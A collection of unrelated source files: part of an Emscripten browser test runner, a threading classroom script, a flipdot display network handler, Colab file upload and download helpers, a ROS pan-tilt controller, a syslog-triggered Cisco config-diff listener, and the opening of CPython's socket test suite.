actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all the JS engines in JS_ENGINES appears to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
if not EMTEST_SAVE_DIR:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
aula_sd.py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
Este é um arquivo de script temporário.
"""
#aula sistemas distribuidos 24/09/2018
import threading
import time
'''
def seu_coracao():
print ('<3')
return
threads = []
for i in range(5):
t = threading.Thread(target=seu_coracao)
threads.append(t)
t.start()
def ola_mundo(numero1, numero2):
print('numeros: %s %s' % (numero1, numero2))
print('resultado = %d' % (int(numero1) + int(numero2)))
return
t = threading.Thread(target=ola_mundo, args=(2, 3))
t.start()
def ola_mundo(numero1, numero2):
print('numeros: %s %s' % (numero1, numero2))
print('resultado = %d' % (int(numero1) + int(numero2)))
return
threads = []
for i in range(5):
t = threading.Thread(target=ola_mundo, args=(2, 1))
threads.append(t)
t.start()
'''
def funcao():
print(threading.currentThread().getName(), ' iniciando')
time.sleep(2)
print(threading.currentThread().getName(), ' encerrando')
return
t = threading.Thread(target=funcao) # usa o nome padrao da thread
t.start()
|
handler.py
|
"""
Handlers that handle data streams from a UDP/TCP socket or RS485 port.
The main use for these are with the simulator but the TCPHandler for example can also be used to forward data to a Display initialised with RS485 clients - providing the same functionality as a Ethernet/RS485 device.
"""
import threading
import serial
import socketserver
class Handler(socketserver.BaseRequestHandler):
"""
Base flipdot network socket handler - overloaded with TCPHandler and UDPHandler
"""
def __init__(self, update_fn):
"""
Overload __init__ in order to pass a function that will do a display update - physical or sim.
The overload will cause the BaseRequestHandler to not include required args. __call__ is overloaded in the extended class however, which instaniates the StreamRequestHandler with these args and the new class
:param update_fn function: pointer to function that takes bytearray and sends to display
"""
self.update_fn = update_fn
# overloading the __call__ allows us to pass the update_fn instance to the handler when created y the server: https://stackoverflow.com/a/45233774/3959671
def __call__(self, request, client_address, server):
h = Handler(self.update_fn)
socketserver.StreamRequestHandler.__init__(h, request, client_address, server)
def handle(self):
"""
Will be overloaded by extended classes below
"""
pass
@staticmethod
def isvalid(data: bytearray):
"""
Checks data recieved is valid for a AlfaZeta display
:param data bytearray: data to be checked
:rtype bool: True if valid, False if now
"""
if data[0] != 0x80:
print("no start")
return False
if data[1] not in {0x81, 0x82, 0x83, 0x84, 0x85, 0x86}:
print("not right command")
return False
ln = 0
if data[1] in {0x81, 0x82}:
ln = 112
elif data[1] in {0x83, 0x84}:
ln = 28
elif data[1] in {0x85, 0x86}:
ln = 56
if len(data) != (ln + 4):
print("bad length", len(data))
return False
if data[-1] != 0x8F:
print("no end")
return False
return True
@staticmethod
def update_display(data, update_fn):
"""
Update display using passed update_fn; forwards bytearray to display - allows usage with sim or physical
We could just call the method directly in Handler class but this allows us to do any pre/pot processing
"""
update_fn(data)
class TCPHandler(Handler):
# overloading the __call__ allows us to pass the update_fn instance to the handler when created y the server: https://stackoverflow.com/a/45233774/3959671
def __call__(self, request, client_address, server):
h = TCPHandler(self.update_fn)
socketserver.StreamRequestHandler.__init__(h, request, client_address, server)
def handle(self):
"""
Handle will close socket on return so stay here waiting for recv (will
return 0 on break) this behavior is like the Ethernet -> RS485 boxes.
Socket is blocking but this is a thread so it's ok
"""
while 1:
data = bytearray()
chunk = None
# unload until we get the end of frame char (or client disconnect)
while chunk != b"\x8F":
chunk = self.request.recv(1)
# client closed so return and close server connection
if chunk == b"":
return
data.extend(chunk)
# we have data so validate and send to display if valid
if len(data) > 0:
if self.isvalid(data):
self.update_display(data, self.update_fn)
class UDPHandler(Handler):
# overloading the __call__ allows us to pass the update_fn instance to the handler when created y the server: https://stackoverflow.com/a/45233774/3959671
def __call__(self, request, client_address, server):
h = UDPHandler(self.update_fn)
socketserver.StreamRequestHandler.__init__(h, request, client_address, server)
def handle(self):
data = self.request[0]
if self.isvalid(data):
self.update_display(data, self.update_fn)
class SerialHandler():
"""
Custom handler for Serial data, which mirrors BaseRequestHandler usage
"""
def __init__(self, port, update_fn, baudrate=57600):
self.chan = serial.Serial()
self.chan.baudrate = baudrate
self.chan.port = port
self.chan.timeout = 10.0
self.thread = threading.Thread(target=self.read_from_port)
self.thread.daemon = True
self.update_fn = update_fn
def open(self):
self.chan.open()
self.thread.start()
def close(self):
self.chan.close()
def read_from_port(self):
while True:
if self.chan.in_waiting > 0:
data = self.chan.read_until(b"\x8F")
if data: self.handle(data)
def handle(self, data):
if Handler.isvalid(data):
Handler.update_display(data, self.update_fn)
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
|
files.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Colab-specific file helpers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import collections
import os
import socket
import threading
import uuid
import IPython
import portpicker
import six
from six.moves import SimpleHTTPServer
from six.moves import socketserver
from google.colab import output
def upload():
"""Renders widget to upload local (to the browser) files to the kernel.
Blocks until the files are available.
Returns:
A map of the form {<filename>: <file contents>} for all uploaded files.
"""
upload_id = str(uuid.uuid4())
input_id = 'files-' + upload_id
output_id = 'result-' + upload_id
IPython.display.display(
IPython.core.display.HTML("""
<input type="file" id="{input_id}" name="files[]" multiple disabled />
<output id="{output_id}">
Upload widget is only available when the cell has been executed in the
current browser session. Please rerun this cell to enable.
</output>
<script src="/nbextensions/google.colab/files.js"></script> """.format(
input_id=input_id, output_id=output_id)))
# First result is always an indication that the file picker has completed.
result = output.eval_js(
'google.colab._files._uploadFiles("{input_id}", "{output_id}")'.format(
input_id=input_id, output_id=output_id))
files = collections.defaultdict(six.binary_type)
# Mapping from original filename to filename as saved locally.
local_filenames = dict()
while result['action'] != 'complete':
result = output.eval_js(
'google.colab._files._uploadFilesContinue("{output_id}")'.format(
output_id=output_id))
if result['action'] != 'append':
# JS side uses a generator of promises to process all of the files- some
# steps may not produce data for the Python side, so just proceed onto the
# next message.
continue
data = base64.b64decode(result['data'])
filename = result['file']
files[filename] += data
local_filename = local_filenames.get(filename)
if not local_filename:
local_filename = _get_unique_filename(filename)
local_filenames[filename] = local_filename
print('Saving {filename} to {local_filename}'.format(
filename=filename, local_filename=local_filename))
with open(local_filename, 'ab') as f:
f.write(data)
return dict(files)
def _get_unique_filename(filename):
if not os.path.lexists(filename):
return filename
counter = 1
while True:
path, ext = os.path.splitext(filename)
new_filename = '{} ({}){}'.format(path, counter, ext)
if not os.path.lexists(new_filename):
return new_filename
counter += 1
class _V6Server(socketserver.TCPServer):
address_family = socket.AF_INET6
class _FileHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""SimpleHTTPRequestHandler with a couple tweaks."""
def translate_path(self, path):
# Client specifies absolute paths.
return path
def log_message(self, fmt, *args):
# Suppress logging since it's on the background. Any errors will be reported
# via the handler.
pass
def end_headers(self):
# Do not cache the response in the notebook, since it may be quite large.
self.send_header('x-colab-notebook-cache-control', 'no-cache')
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def download(filename):
"""Downloads the file to the user's local disk via a browser download action.
Args:
filename: Name of the file on disk to be downloaded.
Raises:
OSError: if the file cannot be found.
"""
if not os.path.exists(filename):
msg = 'Cannot find file: {}'.format(filename)
if six.PY2:
raise OSError(msg)
else:
raise FileNotFoundError(msg) # pylint: disable=undefined-variable
started = threading.Event()
port = portpicker.pick_unused_port()
def server_entry():
httpd = _V6Server(('::', port), _FileHandler)
started.set()
# Handle a single request then exit the thread.
httpd.handle_request()
thread = threading.Thread(target=server_entry)
thread.start()
started.wait()
output.eval_js(
"""
(async function() {
const response = await fetch('https://localhost:%(port)d%(path)s');
if (!response.ok) {
throw new Error('Failed to download: ' + response.statusText);
}
const blob = await response.blob();
const a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = '%(name)s';
a.click();
})();
""" % {
'port': port,
'path': os.path.abspath(filename),
'name': os.path.basename(filename),
})
|
move_ptu_myo.py
|
#!/usr/bin/env python
PKG = 'usma_ptu'
import roslib; roslib.load_manifest(PKG)
import time
from math import pi
from threading import Thread
import rospy
from std_msgs.msg import UInt8
from std_msgs.msg import Float64
from sensor_msgs.msg import Imu
from geometry_msgs.msg import Quaternion
from dynamixel_controllers.srv import *
from dynamixel_msgs.msg import JointState as JointState
class MovePTU():
def __init__(self):
self.is_running = True
self.step_size = 1.0 * 3.14 / 180.0
self.prev_time = time.time()
self.g = 0
self.x = 0
self.y = 0
self.tapcount=0
self.onoff = False
rospy.init_node('move_ptu_myo', anonymous=True)
self.pan_axis = rospy.get_param('/axes_map/pan')
self.tilt_axis = rospy.get_param('/axes_map/tilt')
rospy.Subscriber('/myo_gest', UInt8, self.read_myo_gest)
rospy.Subscriber('/myo_imu', Imu, self.read_myo_imu)
self.pan_joint = 0.0
self.tilt_joint = 0.0
self.servo_position_pan = rospy.Publisher('/pan_controller/command', Float64)
self.servo_position_tilt = rospy.Publisher('/tilt_controller/command', Float64)
def read_myo_gest(self, data):
self.g = data.data
if (self.g == 5):
self.tapcount +=1
if (self.tapcount%2==1):
self.onoff = True
if (self.tapcount%2==0):
self.onoff = False
def read_myo_imu(self,data):
self.x = data.linear_acceleration.x
def update_ptu_position(self):
while self.is_running:
if self.onoff:
if (self.g == 3):
self.pan_joint += 1 * self.step_size
elif (self.g == 2):
self.pan_joint -= 1 * self.step_size
if (self.x > -0.2 and self.x <0.2):
self.tilt_joint += 1 * self.step_size
if (self.x > 0.8 and self.x <1.0):
self.tilt_joint -= 1 * self.step_size
self.servo_position_pan.publish(self.pan_joint)
self.servo_position_tilt.publish(self.tilt_joint)
time.sleep(0.05)
if __name__ == '__main__':
try:
move_ptu = MovePTU()
t = Thread(target=move_ptu.update_ptu_position)
t.start()
rospy.spin()
move_ptu.alive = False
t.join()
except rospy.ROSInterruptException: pass
|
main.py
|
#!/usr/bin/env python3
import socket
import sys
import threading
import time
import re
from functions.worker import worker
from env_variables import SERVER_IP
from env_variables import SERVER_PORT
from env_variables import cisco_username
from env_variables import cisco_password
from functions.logging import myLogger
log = myLogger("pythong_logger")
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (SERVER_IP, SERVER_PORT)
log.info("SERVER: Server starting up on {} TCP port {}".format(server_address[0],server_address[1]))
print('INFO: Server starting up on {} TCP port {}'.format(server_address[0],server_address[1]))
sock.bind(server_address)
sock.listen(1)
def main():
while True:
# Wait for a connection
log.info("SERVER: Server is waiting for a connection")
print('INFO: Server is waiting for a connection')
connection, client_address = sock.accept()
log.info("SERVER: Connection from {}".format(client_address))
print('INFO: Connection from', client_address)
# Receive the data in small chunks and retransmit it
while True:
time.sleep(1)
data = connection.recv(1024)
if data:
data = str(data)
log.info("SERVER: {}".format(data))
print("INFO", data)
if "Configured from" in data and "admin" not in data:
ip_addr = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b ",data)
if len(ip_addr) >= 1:
# Regular IP on the Syslog
for ip in ip_addr:
log.info("SERVER: Creating Worker for the ip: {}".format(ip))
print("INFO: Creating Worker for the ip: {}".format(ip))
log_worker = threading.Thread(target=worker, args=(ip,cisco_username,cisco_password))
log.info("SERVER: Launching worker to perform config diff: {}".format(ip))
print("INFO: Launching worker to perform config diff: {}".format(ip))
log_worker.start()
else:
connection.close()
break
if __name__ == "__main__":
main()
|
test_socket.py
|
import unittest
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
